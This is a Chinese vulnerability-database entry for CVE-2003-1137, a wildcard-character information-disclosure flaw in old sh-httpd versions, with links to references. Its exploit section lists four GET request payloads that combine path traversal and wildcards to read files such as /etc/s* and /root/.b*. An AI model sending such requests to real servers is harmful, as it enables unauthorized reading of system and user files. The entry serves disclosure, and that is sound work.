SH-HTTPD字符过滤远程信息泄露漏洞

SH-HTTPD字符过滤远程信息泄露漏洞

漏洞ID 1107546 漏洞类型 输入验证
发布时间 2003-10-27 更新时间 2005-10-20
图片[1]-SH-HTTPD字符过滤远程信息泄露漏洞-安全小百科CVE编号 CVE-2003-1137
图片[2]-SH-HTTPD字符过滤远程信息泄露漏洞-安全小百科CNNVD-ID CNNVD-200310-080
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23295
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200310-080
|漏洞详情
CharlesSteinkuehlersh-httpd0.3和0.4版本存在漏洞。远程攻击者可以通过含有星号(*)通配符的GET请求读取文件或执行任意CGI脚本。
|漏洞EXP
source: http://www.securityfocus.com/bid/8897/info

A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information. 


GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*
|参考资料

来源:BID
名称:8897
链接:http://www.securityfocus.com/bid/8897
来源:BUGTRAQ
名称:20031028Re:sh-httpd`wildcardcharacter’vulnerability
链接:http://www.securityfocus.com/archive/1/342766
来源:BUGTRAQ
名称:20031027sh-httpd`wildcardcharacter’vulnerability
链接:http://www.securityfocus.com/archive/1/342473
来源:XF
名称:shtttpd-get-information-disclosure(13519)
链接:http://xforce.iss.net/xforce/xfdb/13519

相关推荐: ProfitCode Software PayProCart 3.0 – Ckprvd Cross-Site Scripting

ProfitCode Software PayProCart 3.0 – Ckprvd Cross-Site Scripting 漏洞ID 1055025 漏洞类型 发布时间 2005-04-21 更新时间 2005-04-21 CVE编号 N/A CNNVD…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享